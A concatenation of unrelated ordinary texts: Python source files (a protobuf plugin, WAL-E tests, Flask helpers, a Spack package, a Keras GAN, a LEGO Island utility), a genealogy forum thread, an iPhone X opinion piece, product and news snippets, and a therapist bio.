module_name = self.filename_to_module[file_name][1]
python_name = module_name + '.' + name + nested_name
self.type_map[fullname] = python_name
def get_type_map(self):
return self.type_map
def get_includes(self):
return sorted(
self.filename_to_module[fn] for fn in self.includes_needed)
def generate_code(request, response):
assert isinstance(request, plugin.CodeGeneratorRequest)
include_manager = IncludeManager()
for proto_file in request.proto_file:
include_manager.extend_symbol_tables(proto_file)
methods = []
for data in traverse_methods(proto_file):
methods.append(data)
include_manager.add_needed_symbol(data['input_type'])
include_manager.add_needed_symbol(data['output_type'])
include_manager.add_needed_symbol(data['service'])
type_map = include_manager.get_type_map()
includes = include_manager.get_includes()
# as a nice side-effect, generate a json file capturing the essence
# of the RPC method entries
f = response.file.add()
f.name = proto_file.name + '.json'
f.content = dumps(dict(
type_rename_map=type_map,
includes=includes,
methods=methods), indent=4)
# generate the real Python code file
f = response.file.add()
assert proto_file.name.endswith('.proto')
f.name = proto_file.name.replace('.proto', '_rpc_gw.py')
f.content = generate_gw_code(proto_file.name,
methods, type_map, includes)
if __name__ == '__main__':
if len(sys.argv) >= 2:
# read input from file, to allow troubleshooting
with open(sys.argv[1], 'r') as f:
data = f.read()
else:
# read input from stdin
data = sys.stdin.read()
# parse request
request = plugin.CodeGeneratorRequest()
request.ParseFromString(data)
# create response object
response = plugin.CodeGeneratorResponse()
# generate the output and the response
generate_code(request, response)
# serialize the response
output = response.SerializeToString()
# write response to stdout
sys.stdout.write(output)
|
I am glad to see this forum pop up. My late mother, Helen E Rafferty did extensive genealogy on our family lines, one of which was Bolles Here is a thumbnail sketch 1. Joseph 1608 2. Joseph 1654-1683 3. Joseph 1680? 4. Joseph 1712 -? 5.Lemuel 1755-1805 6. Erastus 1788-1859 7.David 1823-1850 8.Ellen Georgiana 1848-1935 9. Ernest Valentine McNally 1877-1945 10. Helen Elizabeth McNally Rafferty 1908-98. Ernest was my Maternal grandfather married to Anna Barbara Byer. They were involved with the silk mills in Pennsylvania and Belding, Mi where, after the closure of the Mills in 1932, became mayor of Belding, School Board and manager of the Belding Hotel. Ellen Georgiana came to live with them and died in a tragic kitchen fire. My mother was made a member of the D.A.R thru Lemuel's service.
though several family histories mentionsher, none that will stand up to standards of lineage societies. Marcy Crouch went on to marry Ichabod Pierce.
Does anyone have any documentation proving the relationship between Christiana Bolles and daughter Mary Crouch? I would be so grateful!
Hello, all! My name is Maureen and I am researching my family ancestry. Does anyone have any information on John Robinson Bolles (born 1762/1763 in New London, CT)? He married his cousin, Rebecca Bolles in 1788. I am looking for documentation to support these events. I am also in need of information/documentation on Rebecca Bolles. I believe she later remarried a George Lapham, and at some point moved to Michigan possibly to live with her son Frederick. Any help is greatly appreciated. I need the documentation for membership in DAR. My email is reanniec@gmail.com. Thank you.
Thanks so much for the updated Bolles /Frost info. Greatly appreciated!
1. Joseph Bolles from Scampton England) had Daughter.
    3. Joseph Bolles.
Does anyone know the connection between the Bolles family and the Salter, Frost, Hayes, and Shepley families of Maine? Thank you!
Bolles family in Woodford, Vermont. We were wondering if anyone has found a will or estate record for Phineas Bolles who died 20 Oct 1867 in Woodford, Vermont. We are trying to prove he had a daughter named Phila who married a Hicks/Hix and lived in Sunderland. So far no one has found any proof we can find that Phila Bolles is part of this family.
Print | Views: 12117 (Unique: 3442 ) / Subscribers: 6 | What's this? |
import pytest
from stage_pgxlog import pg_xlog
from wal_e import worker
from wal_e import exception
# Quiet pyflakes about pytest fixtures.
assert pg_xlog
def make_segment(num, **kwargs):
return worker.WalSegment('pg_xlog/' + str(num) * 8 * 3, **kwargs)
def test_simple_create():
"""Check __init__."""
make_segment(1)
def test_mark_done_invariant():
"""Check explicit segments cannot be .mark_done'd."""
seg = make_segment(1, explicit=True)
with pytest.raises(exception.UserCritical):
seg.mark_done()
def test_mark_done(pg_xlog):
"""Check non-explicit segments can be .mark_done'd."""
seg = make_segment(1, explicit=False)
pg_xlog.touch(seg.name, '.ready')
seg.mark_done()
def test_mark_done_problem(pg_xlog, monkeypatch):
"""Check that mark_done fails loudly if status file is missing.
While in normal operation, WAL-E does not expect races against
other processes manipulating .ready files. But, just in case that
should occur, WAL-E is designed to crash, exercised here.
"""
seg = make_segment(1, explicit=False)
with pytest.raises(exception.UserCritical):
seg.mark_done()
def test_simple_search(pg_xlog):
"""Must find a .ready file"""
name = '1' * 8 * 3
pg_xlog.touch(name, '.ready')
segs = worker.WalSegment.from_ready_archive_status('pg_xlog')
assert segs.next().path == 'pg_xlog/' + name
with pytest.raises(StopIteration):
segs.next()
def test_multi_search(pg_xlog):
"""Test finding a few ready files.
Also throw in some random junk to make sure they are filtered out
from processing correctly.
"""
for i in xrange(3):
ready = str(i) * 8 * 3
pg_xlog.touch(ready, '.ready')
# Throw in a complete segment that should be ignored.
complete_segment_name = 'F' * 8 * 3
pg_xlog.touch(complete_segment_name, '.done')
# Throw in a history-file-alike that also should not be found,
# even if it's ready.
ready_history_file_name = ('F' * 8) + '.history'
pg_xlog.touch(ready_history_file_name, '.ready')
segs = worker.WalSegment.from_ready_archive_status(str(pg_xlog.pg_xlog))
for i, seg in enumerate(segs):
assert seg.name == str(i) * 8 * 3
assert i == 2
# Make sure nothing interesting happened to ignored files.
pg_xlog.assert_exists(complete_segment_name, '.done')
pg_xlog.assert_exists(ready_history_file_name, '.ready')
|
Is iPhone X Really The Future Of The Smartphone?
Should iPhone X even be called a telephone? It does of course support telephony and texting, but its main feature set is oriented to other things. It is also debatable whether it makes any rational sense at all to be walking around with a device in your pocket that sells for $1,000 up unless you travel with a retinue of personal bodyguards.
Then there’s the matter of overrkill. The iPhone X’s A11 Bionic six-core system-on-chip would have placed it in the supercomputer category back in the ’80s and ’90s. Apple says it’s the most powerful and smartest chip ever deployed in a smartphone, with two 25 percent faster performance cores and four efficiency cores that are 70 percent faster than the foregoing A10 Fusion SoC plus a new, second-generation performance controller that can harness all six cores simultaneously, delivering up to 70 percent greater performance for multi-threaded workloads, with battery life two hours longer than with iPhone 7. A11 Bionic also has an Apple-designed three-core GPU with a that it claims delivers up to 30 percent faster graphics performance than the previous generation of iPhone GPUs.
The trouble is, all this power will likely get used mostly for entertaining but trivial pursuits. iPhone X’s neural engine in A11 Bionic is purpose-built for machine learning, augmented reality apps and immersive 3D games — a dual-core chip that can perform up to 600 billion operations per second for real-time processing, designed for specific machine learning algorithms and also enables Face ID (which does have practical uses), Animoji and other features demanding large amounts of computing power.
To create Animoji, working with A11 Bionic, the TrueDepth camera captures and analyzes over 50 different facial expression muscle movements which it then animates in a dozen different Animoji templates, including a panda, a unicorn and a robot. Available as an iMessage app pre-installed on iPhone X, users can record and send Animoji messages with their voice that can smile, frown and more. Whatever floats your boat I guess.
Apple says iPhone X ‘s all-glass front and back, available in silver and space grey, feature the most durable glass ever used in a smartphone.
iPhone X’s 5.8-inch Super Retina water and dust resistant all-screen display display employs new OLED technology enabling it to precisely follow the curves of the design, all the way to the rounded corners. A seven-layer colour process allows for precise colour hues and opacity on the glass finish enhanced by a reflective optical layer.
Apple says the iPhone X display is the first OLED panel that rises to iPhone standards with true blacks, a million-to-one contrast ratio, and system-wide colour management in a smartphone, also supporting Dolby Vision, HDR, and HDR10, and the addition of True Tone dynamically adjusts the white balance of the display to match the surrounding light.
It is that latter by default, but the future of the smartphone I think not, at least not in any mass-market sense. It’s too expensive for starters, and the mainstream smartphone market is not interested in paying premium prices for “fluid new user experiences” on their mobile. None of Mr. Schiller’s list of marquee iPhone X features solves practical problems that any of us knew we had. Very few smartphone users have any practical reason to carry a supercomputer that can perform up to 600 billion operations per second in their pocket. The personal security issues discussed above also pertain.
A better choice for most of us will be iPhone 8 or iPhone 8 Plus, a more evolutionary design featuring new Retina HD displays and powered by the A11 Bionic SoC. The iPhone 8s get upgraded cameras with Portrait mode and Portrait Lighting, support wireless charging, and augmented reality (AR) optimization unprecedented in a smartphone.
Space grey, silver and gold finishes on iPhone 8 and iPhone 8 Plus are made using a similar process to the one used in in iPhone X, and introduce a water and dust resistant glass back design made with more of that most durable glass ever in a smartphone and a colour-matched aerospace-grade aluminum bezel. Their 4.7-inch and 5.5-inch Retina HD displays now support True Tone, and Apple says their redesigned stereo speakers are up to 25 percent louder and deliver deeper base.
iPhone 8 and iPhone 8 Plus feature an improved 12-megapixel camera with a larger and faster sensor, a new colour filter, and new Apple-designed image signal processor that delivers advanced pixel processing, wide colour capture, faster autofocus in low light and better HDR photos, while a new quad LED True Tone Flash with Slow Sync results in more uniformly lit backgrounds and foregrounds.
Apple says each camera is individually calibrated, with new gyroscopes and accelerometers for accurate motion tracking and AR benefits from A11 Bionic, which handles world tracking, scene recognition and graphics at 60fps, while the image signal processor does real-time lighting estimation.
iPhone X will be available in silver and space gray in 64GB and 256GB models starting at $999, and iPhone 8 and iPhone 8 Plus will be available in space gray, silver and an all-new gold finish in increased 64GB and 256GB capacity models starting at $699 (US) from http://apple.com and Apple Stores, and will also be available through Apple Authorized Resellers and carriers (prices may vary).
iPhone 8 and iPhone 8 Plus are not cheap either, but if you can afford the price of ownership (or can live with monthly payments thhrough Apple’s new iPhone Upgrade Program), with them and iPhone X Apple has again raised the bar in smartphone state of the art. |
import json
from flask import Flask, current_app, request
from functools import wraps
import collections
class JSONEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, datetime.datetime):
return obj.isoformat()
return json.JSONEncoder.default(self, obj)
def jsonify(*args, **kwargs):
return current_app.response_class(json.dumps(dict(*args, **kwargs),
indent=None if request.is_xhr else 2, cls=JSONEncoder),
mimetype='application/json')
def support_jsonp(f):
"""Wraps JSONified output for JSONP"""
@wraps(f)
def decorated_function(*args, **kwargs):
callback = request.args.get('callback', False)
if callback:
content = str(callback) + '(' + str(f().data) + ')'
return current_app.response_class(content, mimetype='application/json')
else:
return f(*args, **kwargs)
return decorated_function
def support_jsonp_publishercode(f):
"""Wraps JSONified output for JSONP"""
@wraps(f)
def decorated_function(*args, **kwargs):
callback = request.args.get('callback', False)
if callback:
content = str(callback) + '(' + str(f(kwargs['publisher_code']).data) + ')'
return current_app.response_class(content, mimetype='application/json')
else:
return f(*args, **kwargs)
return decorated_function
def publication_timeline(data, cumulative=False, group=6, provide={7,2}, label_group="date", label_provide={"count", "element"}):
properties = set(map(lambda x: (str(x[group])), data))
b = map(lambda x: (x[group],list(map(lambda y: str(x[y]), provide))), data)
out = {}
out['publication'] = {}
out['publication_sorted'] = {}
out['unknown'] = {}
for s, k in b:
try:
if (k[0] != "None"):
out['publication'][str(s)].update({(k[0], k[1])})
else:
out['unknown'][str(s)].update({(k[0], k[1])})
except KeyError:
if (k[0] != "None"):
out['publication'][str(s)] = {}
out['publication'][str(s)].update({(k[0], k[1])})
else:
out['unknown'][str(s)] = {}
out['unknown'][str(s)].update({(k[0], k[1])})
for t in out:
try:
a=out[t]
except KeyError:
out[t] = 0
out['publication_sorted'] = []
for e, v in out['publication'].items():
prevkey_val = 0
latest_count = {}
try:
del v["None"]
except KeyError:
pass
for key in sorted(v.iterkeys()):
newdata = {}
newdata[label_group] = e
if (cumulative == True):
try:
latest_count[e] = int(v[key])
except KeyError:
latest_count[e] = 0
prevkey_val = int(v[key]) + prevkey_val
newdata["count"] = int(v[key]) + latest_count[e]
newdata["element"] = key
out['publication_sorted'].append(newdata)
return out
def publication_dates_groups(data, cumulative=False, group=6, provide={7,2}, label_group="date", label_provide={"count", "element"}):
dates = set(map(lambda x: (str(x[group])), data))
elements = set(map(lambda x: (x[2]), data))
alldata = map(lambda x: ((str(x[group]), x[2]),x[7]), data)
b = map(lambda x: (x[group],list(map(lambda y: str(x[y]), provide))), data)
out = {}
out["dates"] = []
prev_values = {}
for p in sorted(dates):
# get each element
newdata = {}
newdata["date"] = p
for e in elements:
try:
prev_values[e]
except KeyError:
prev_values[e] = 0
newdata[e] = 0
for data in alldata:
if ((data[0][0] == p) and (data[0][1]==e)):
newdata[e] = data[1]
prev_values[e] = prev_values[e] + data[1]
else:
newdata[e] = prev_values[e]
if (newdata[e] == 0):
newdata[e] = prev_values[e]
out["dates"].append(newdata)
# get each date
return out
def nest_compliance_results(data):
properties = set(map(lambda x: (x[2]), data))
b = map(lambda x: (x[2],(x[6], x[7])), data)
out = {}
for s, k in b:
try:
out[s].update({(k[0], k[1])})
except KeyError:
out[s] = {}
out[s].update({(k[0], k[1])})
values = {'fc', 'pc', 'uc', 'fp', 'up'}
for t in out:
for v in values:
try:
a=out[t][v]
except KeyError:
out[t][v] = 0
return out
def toUs(element):
# replace hyphen with underscore
us = re.sub("-", "_", element)
return us
def merge_dict(d1, d2):
# from here: http://stackoverflow.com/questions/10703858/python-merge-multi-level-dictionaries
"""
Modifies d1 in-place to contain values from d2. If any value
in d1 is a dictionary (or dict-like), *and* the corresponding
value in d2 is also a dictionary, then merge them in-place.
"""
for k,v2 in d2.items():
v1 = d1.get(k) # returns None if v1 has no value for this key
if ( isinstance(v1, collections.Mapping) and
isinstance(v2, collections.Mapping) ):
merge_dict(v1, v2)
else:
d1[k] = v2 |
Reply to post: Re: iMessage and the perceived green bubble of fail..
Re: iMessage and the perceived green bubble of fail..
Using WhatsApp means bending over for faecebook.
Who even knows about Telegram, seems like a shady outfit too. |
# Copyright 2013-2019 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class IbmDatabroker(CMakePackage, PythonPackage):
"""The Data Broker (DBR) is a distributed, in-memory container of key-value
stores enabling applications in a workflow to exchange data through one or
more shared namespaces. Thanks to a small set of primitives, applications
in a workflow deployed in a (possibly) shared nothing distributed cluster,
can easily share and exchange data and messages with applications."""
homepage = "https://github.com/IBM/data-broker"
git = "https://github.com/IBM/data-broker"
url = 'https://github.com/IBM/data-broker/archive/0.6.1.tar.gz'
# IBM dev team should take over
maintainers = ['bhatiaharsh']
version('master', branch='master')
version('0.7.0', sha256='5460fa1c5c05ad25c759b2ee4cecee92980d4dde5bc7c5f6da9242806cf22bb8')
version('0.6.1', sha256='2c7d6c6a269d4ae97aad4d770533e742f367da84758130c283733f25df83e535')
version('0.6.0', sha256='5856209d965c923548ebb69119344f1fc596d4c0631121b230448cc91bac4290')
variant('python', default=False, description='Build Python bindings')
depends_on('cmake@2.8:', type='build')
depends_on('redis@5.0.2:', type='run')
depends_on('libevent@2.1.8', type=('build', 'run'))
extends('python@3.7:', when='+python')
depends_on('py-setuptools', when='+python')
patch('fixes_in_v0.6.1.patch', when='@0.6.1')
patch('fixes_in_v0.7.0.patch', when='@0.7.0')
def cmake_args(self):
args = []
args.append('-DDEFAULT_BE=redis')
if '+python' in self.spec:
args.append('-DPYDBR=1')
return args
|
StressFix formula contains 93% of active ingredients. Strengthens skin barrier, fights free radicals and blocks pollutants.
Shea Butter, Stearic Acid, Moringa Oleifera Seed Oil, Glycerin, Cetyl Alcohol, Tocopheryl Acetate, Cetearyl Olivate, Sorbitan Oleate, Glyceryl Stearate, Sorbitan Olivate, Glyceryl Caprylate, Cholesterol, Polyoxymethylene Melamine, Arginine, Caprylhydroxamic Acid, Decarboxy Carmosine HCL, Hydrolyzed Sodium Hyaluronate, Xanthan Gum, Yeast Extract, Butylene Glycol, Sunflower Seed Oil, Rosemary Leaf Extract, 1,2-Hexanediol, Caprylyl Glycol, Phenoxyethanol, Fragance (Parfum), Iron Oxides (CI 77499), Limonene, Benzyl Benzoate, Linalool. |
'''
Copyright 2016 Debayan Banerjee, Shreyank Gupta
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import urllib2,json
from random import randint
class WeekendModel(object):
dc = {}
def __init__(self, logger):
self.logger = logger
self.restaurant_name = None
self.restaurant_address = None
self.movie_name = None
self.zomatokey = '39e91731af08d26261adf655948d9daa'
def ifintentclear(self, stt, text=None, reply=[]):
if 'movie' in text.lower() or 'restaurant' in text.lower():
return True
else:
return False
def ifintentmovie(self, stt, text=None, reply=[]):
if 'movie' in text.lower():
req = urllib2.Request("http://www.omdbapi.com/?s=bot")
contents = urllib2.urlopen(req).read()
d = json.loads(str(contents))
sub = randint(0,9)
self.movie_name = d['Search'][sub]['Title']
return True
else:
return False
def ifintentrestaurant(self, stt, text=None, reply=[]):
if 'restaurant' in text.lower():
return True
else:
return False
def ifvalidcity(self, stt, text=None, reply=[]):
req = urllib2.Request("https://developers.zomato.com/api/v2.1/locations?query=%s"%text, headers={'user-key': '39e91731af08d26261adf655948d9daa','Accept':'application/json'})
contents = urllib2.urlopen(req).read()
d = json.loads(contents)
if len(d['location_suggestions']) == 0:
return False
else:
entity_id = d['location_suggestions'][0]['entity_id']
entity_type = d['location_suggestions'][0]['entity_type']
d = {}
req = urllib2.Request("https://developers.zomato.com/api/v2.1/location_details?entity_id=%s&entity_type=%s"%(entity_id, entity_type), headers={'user-key': '39e91731af08d26261adf655948d9daa','Accept':'application/json'})
contents = urllib2.urlopen(req).read()
d = json.loads(contents)
self.restaurant_name = d['best_rated_restaurant'][0]['restaurant']['name']
self.restaurant_address = d['best_rated_restaurant'][0]['restaurant']['location']['address']
return True
|
The company provides uniform, food and facilities services to establishments like schools, prisons, and workplaces.
The company will begin to ditch single-use plastic straws, where possible, in September.
A pilot program with Apple and Aramark is running from July 20 to August 5 at Citizens Bank Park.
The NFL, PepsiCo, and Aramark team up in Minneapolis.
A closer look at the organization's methods offers a useful case study in the art of advocacy and negotiation. |
from keras.models import Model
from keras.layers.core import Flatten, Dense, Dropout, Activation, Lambda, Reshape
from keras.layers.convolutional import Conv2D, Deconv2D, ZeroPadding2D, UpSampling2D
from keras.layers import Input, merge
from keras.layers.advanced_activations import LeakyReLU
from keras.layers.normalization import BatchNormalization
from keras.layers.pooling import MaxPooling2D
import keras.backend as K
def generator_upsampling(cat_dim, cont_dim, noise_dim, img_dim, bn_mode, model_name="generator_upsampling", dset="mnist"):
"""
Generator model of the DCGAN
args : img_dim (tuple of int) num_chan, height, width
pretr_weights_file (str) file holding pre trained weights
returns : model (keras NN) the Neural Net model
"""
s = img_dim[1]
f = 128
if dset == "mnist":
start_dim = int(s / 4)
nb_upconv = 2
else:
start_dim = int(s / 16)
nb_upconv = 4
if K.image_dim_ordering() == "th":
bn_axis = 1
reshape_shape = (f, start_dim, start_dim)
output_channels = img_dim[0]
else:
reshape_shape = (start_dim, start_dim, f)
bn_axis = -1
output_channels = img_dim[-1]
cat_input = Input(shape=cat_dim, name="cat_input")
cont_input = Input(shape=cont_dim, name="cont_input")
noise_input = Input(shape=noise_dim, name="noise_input")
gen_input = merge([cat_input, cont_input, noise_input], mode="concat")
x = Dense(1024)(gen_input)
x = BatchNormalization()(x)
x = Activation("relu")(x)
x = Dense(f * start_dim * start_dim)(x)
x = BatchNormalization()(x)
x = Activation("relu")(x)
x = Reshape(reshape_shape)(x)
# Upscaling blocks
for i in range(nb_upconv):
x = UpSampling2D(size=(2, 2))(x)
nb_filters = int(f / (2 ** (i + 1)))
x = Conv2D(nb_filters, (3, 3), padding="same")(x)
x = BatchNormalization(axis=bn_axis)(x)
x = Activation("relu")(x)
# x = Conv2D(nb_filters, (3, 3), padding="same")(x)
# x = BatchNormalization(axis=bn_axis)(x)
# x = Activation("relu")(x)
x = Conv2D(output_channels, (3, 3), name="gen_Conv2D_final", padding="same", activation='tanh')(x)
generator_model = Model(inputs=[cat_input, cont_input, noise_input], outputs=[x], name=model_name)
return generator_model
def generator_deconv(cat_dim, cont_dim, noise_dim, img_dim, bn_mode, batch_size, model_name="generator_deconv", dset="mnist"):
"""
Generator model of the DCGAN
args : nb_classes (int) number of classes
img_dim (tuple of int) num_chan, height, width
pretr_weights_file (str) file holding pre trained weights
returns : model (keras NN) the Neural Net model
"""
assert K.backend() == "tensorflow", "Deconv not implemented with theano"
s = img_dim[1]
f = 128
if dset == "mnist":
start_dim = int(s / 4)
nb_upconv = 2
else:
start_dim = int(s / 16)
nb_upconv = 4
reshape_shape = (start_dim, start_dim, f)
bn_axis = -1
output_channels = img_dim[-1]
cat_input = Input(shape=cat_dim, name="cat_input")
cont_input = Input(shape=cont_dim, name="cont_input")
noise_input = Input(shape=noise_dim, name="noise_input")
gen_input = merge([cat_input, cont_input, noise_input], mode="concat")
x = Dense(1024)(gen_input)
x = BatchNormalization()(x)
x = Activation("relu")(x)
x = Dense(f * start_dim * start_dim)(x)
x = BatchNormalization()(x)
x = Activation("relu")(x)
x = Reshape(reshape_shape)(x)
# Transposed conv blocks
for i in range(nb_upconv - 1):
nb_filters = int(f / (2 ** (i + 1)))
s = start_dim * (2 ** (i + 1))
o_shape = (batch_size, s, s, nb_filters)
x = Deconv2D(nb_filters, (3, 3), output_shape=o_shape, strides=(2, 2), padding="same")(x)
x = BatchNormalization(mode=2, axis=bn_axis)(x)
x = Activation("relu")(x)
# Last block
s = start_dim * (2 ** (nb_upconv))
o_shape = (batch_size, s, s, output_channels)
x = Deconv2D(output_channels, (3, 3), output_shape=o_shape, strides=(2, 2), padding="same")(x)
x = Activation("tanh")(x)
generator_model = Model(inputs=[cat_input, cont_input, noise_input], outputs=[x], name=model_name)
return generator_model
def DCGAN_discriminator(cat_dim, cont_dim, img_dim, bn_mode, model_name="DCGAN_discriminator", dset="mnist", use_mbd=False):
"""
Discriminator model of the DCGAN
args : img_dim (tuple of int) num_chan, height, width
pretr_weights_file (str) file holding pre trained weights
returns : model (keras NN) the Neural Net model
"""
if K.image_dim_ordering() == "th":
bn_axis = 1
else:
bn_axis = -1
disc_input = Input(shape=img_dim, name="discriminator_input")
if dset == "mnist":
list_f = [128]
else:
list_f = [64, 128, 256]
# First conv
x = Conv2D(64, (3, 3), strides=(2, 2), name="disc_Conv2D_1", padding="same")(disc_input)
x = LeakyReLU(0.2)(x)
# Next convs
for i, f in enumerate(list_f):
name = "disc_Conv2D_%s" % (i + 2)
x = Conv2D(f, (3, 3), strides=(2, 2), name=name, padding="same")(x)
x = BatchNormalization(axis=bn_axis)(x)
x = LeakyReLU(0.2)(x)
x = Flatten()(x)
x = Dense(1024)(x)
x = BatchNormalization()(x)
x = LeakyReLU(0.2)(x)
def linmax(x):
return K.maximum(x, -16)
def linmax_shape(input_shape):
return input_shape
# More processing for auxiliary Q
x_Q = Dense(128)(x)
x_Q = BatchNormalization()(x_Q)
x_Q = LeakyReLU(0.2)(x_Q)
x_Q_Y = Dense(cat_dim[0], activation='softmax', name="Q_cat_out")(x_Q)
x_Q_C_mean = Dense(cont_dim[0], activation='linear', name="dense_Q_cont_mean")(x_Q)
x_Q_C_logstd = Dense(cont_dim[0], name="dense_Q_cont_logstd")(x_Q)
x_Q_C_logstd = Lambda(linmax, output_shape=linmax_shape)(x_Q_C_logstd)
# Reshape Q to nbatch, 1, cont_dim[0]
x_Q_C_mean = Reshape((1, cont_dim[0]))(x_Q_C_mean)
x_Q_C_logstd = Reshape((1, cont_dim[0]))(x_Q_C_logstd)
x_Q_C = merge([x_Q_C_mean, x_Q_C_logstd], mode="concat", name="Q_cont_out", concat_axis=1)
def minb_disc(z):
diffs = K.expand_dims(z, 3) - K.expand_dims(K.permute_dimensions(z, [1, 2, 0]), 0)
abs_diffs = K.sum(K.abs(diffs), 2)
z = K.sum(K.exp(-abs_diffs), 2)
return z
def lambda_output(input_shape):
return input_shape[:2]
num_kernels = 300
dim_per_kernel = 5
M = Dense(num_kernels * dim_per_kernel, use_bias=False, activation=None)
MBD = Lambda(minb_disc, output_shape=lambda_output)
if use_mbd:
x_mbd = M(x)
x_mbd = Reshape((num_kernels, dim_per_kernel))(x_mbd)
x_mbd = MBD(x_mbd)
x = merge([x, x_mbd], mode='concat')
# Create discriminator model
x_disc = Dense(2, activation='softmax', name="disc_out")(x)
discriminator_model = Model(inputs=[disc_input], outputs=[x_disc, x_Q_Y, x_Q_C], name=model_name)
return discriminator_model
def DCGAN(generator, discriminator_model, cat_dim, cont_dim, noise_dim):
cat_input = Input(shape=cat_dim, name="cat_input")
cont_input = Input(shape=cont_dim, name="cont_input")
noise_input = Input(shape=noise_dim, name="noise_input")
generated_image = generator([cat_input, cont_input, noise_input])
x_disc, x_Q_Y, x_Q_C = discriminator_model(generated_image)
DCGAN = Model(inputs=[cat_input, cont_input, noise_input],
outputs=[x_disc, x_Q_Y, x_Q_C],
name="DCGAN")
return DCGAN
def load(model_name, cat_dim, cont_dim, noise_dim, img_dim, bn_mode, batch_size, dset="mnist", use_mbd=False):
if model_name == "generator_upsampling":
model = generator_upsampling(cat_dim, cont_dim, noise_dim, img_dim, bn_mode, model_name=model_name, dset=dset)
model.summary()
from keras.utils import plot_model
plot_model(model, to_file='../../figures/%s.png' % model_name, show_shapes=True, show_layer_names=True)
return model
if model_name == "generator_deconv":
model = generator_deconv(cat_dim, cont_dim, noise_dim, img_dim, bn_mode,
batch_size, model_name=model_name, dset=dset)
model.summary()
from keras.utils import plot_model
plot_model(model, to_file='../../figures/%s.png' % model_name, show_shapes=True, show_layer_names=True)
return model
if model_name == "DCGAN_discriminator":
model = DCGAN_discriminator(cat_dim, cont_dim, img_dim, bn_mode,
model_name=model_name, dset=dset, use_mbd=use_mbd)
model.summary()
from keras.utils import plot_model
plot_model(model, to_file='../../figures/%s.png' % model_name, show_shapes=True, show_layer_names=True)
return model
if __name__ == '__main__':
m = generator_deconv((10,), (2,), (64,), (28, 28, 1), 2, 1, model_name="generator_deconv", dset="mnist")
m.summary()
|
Greg is a 1992 University of Evansville (IN) graduate with a Bachelor of Science in Physical Therapy. Greg earned NATABOC certification as an Athletic Trainer in 1995. Greg subsequently completed a post-graduate Master of Health Science degree in Physical Therapy at the University of Indianapolis in 2001.
Greg has extensive continuing education in a wide variety of orthopedic, neurological, industrial and sports topics. Greg’s additional specialties include a Certification in Applied Functional Sciences, a WorkWell certification as a Functional Capacity Evaluation Provider, and certification as an Emergency Medical Responder.
Prior to opening this private practice, Greg has practiced in Crystal Lake since 1995. Originally from Southern Indiana, Greg and his family reside in Wonder Lake and are active in church and sports activities. Greg enjoys reading military history and is an avid sports fan. |
"""
This file is part of ICU (LEGO Island Configuration Utility)
ICU - A collection of LEGO Island Configuration Tools
Created 2012-2013 Triangle717 <http://triangle717.wordpress.com>
ICU is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
ICU is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with ICU. If not, see <http://www.gnu.org/licenses/>.
"""
# ICU ReDirect V2
# Part of ICU (LEGO Island Configuration Utility)
# https://github.com/le717/ICU
# General use modules
import os
import sys
import time
# Main use modules
import winreg
import glob
import shutil
# Special purpose modules
import platform
import webbrowser
# Logging Code
import logging
import yourscorecube
# GUI elements
import tkinter
from tkinter import filedialog
# Global variables
app = "ICU ReDirect"
majver = "Version 2.0"
minver = "Stable"
creator = "Triangle717"
game = "LEGO Island"
# ------------ Begin ICU ReDirect Initialization ------------ #
def preload():
'''Python 3.3.0 and Windows Architecture check'''
logging.info("Begin logging to {0}".format(yourscorecube.logging_file))
logging.info('''
#############################################
{0} {1} {2}
Copyright 2013 {3}
YourScoreCube.log
If you run into a bug, open an issue at
https://github.com/le717/ICU/issues
and attach this file for an easier fix!
#############################################
'''.format(app, majver, minver, creator))
# You need to have at least Python 3.3.0 to run ICU ReDirect
if sys.version_info < (3, 3, 0):
logging.warning('''You are not running Python 3.3.0 or higher!
You need to get a newer version to run {0}'''.format(app))
sys.stdout.write('''\nYou need to download Python 3.3.0 or greater
to run {0} {1} {2}.'''.format(app, majver, minver))
# Don't open browser immediately
time.sleep(2)
logging.info("Open Python download page in a new tab in web browser.")
# New tab, raise browser window (if possible)
webbrowser.open_new_tab("http://python.org/download")
# Close ICU ReDirect
logging.info("Display error message for three seconds")
time.sleep(3)
logging.info("{0} is shutting down.".format(app))
raise SystemExit(0)
# If you are running Python 3.3.0
else:
logging.info('''You are running Python 3.3.0 or greater.
{0} will continue.'''.format(app))
# Declare osbit global variable
global osbit
# User is running 64-bit Windows
if platform.machine() == 'AMD64':
logging.info("User is running 64-bit Windows.")
osbit = "x64"
main()
# User is running 32-bit Windows
elif platform.machine() == 'x86':
logging.info("User is running 32-bit Windows.")
osbit = "x86"
main()
# The user is running an unsupported version of Windows!
else:
logging.warning("User is running an unsupported OS!")
print("\nYou are running an unsupported OS! {0} will now close."
.format(app))
time.sleep(3)
logging.info("{0} is shutting down".format(app))
raise SystemExit(0)
# ------------ End ICU ReDirect Initialization ------------ #
# ------------ Begin ICU ReDirect Menu Layout ------------ #
def main():
'''ICU ReDirect Menu Layout'''
print("\nWelcome to {0} {1} {2}\nCreated 2012-2013 {3}".format(
app, majver, minver, creator))
print('''\nPlease make a selection:\n
[r] ReDirect Save Games
[q] Quit''')
menuopt = input("\n> ")
while True:
if menuopt.lower() == "r":
logging.info("User pressed '[r] ReDirect Save Games'")
ReDirect()
elif menuopt.lower() == "q":
logging.info("User pressed '[q] Quit'")
print("\nGoodbye!")
time.sleep(3)
logging.info('''{0} is shutting down.
'''.format(app))
raise SystemExit(0)
# Undefined input
else:
logging.info("User pressed an undefined key")
main()
# ------------ End ICU ReDirect Menu Layout ------------ #
# ------------ Begin Save Game ReDirect Intro ------------ #
def ReDirect():
'''Save Game ReDirect Launcher'''
# Switch to 32-bit registry string code
if osbit == "x86":
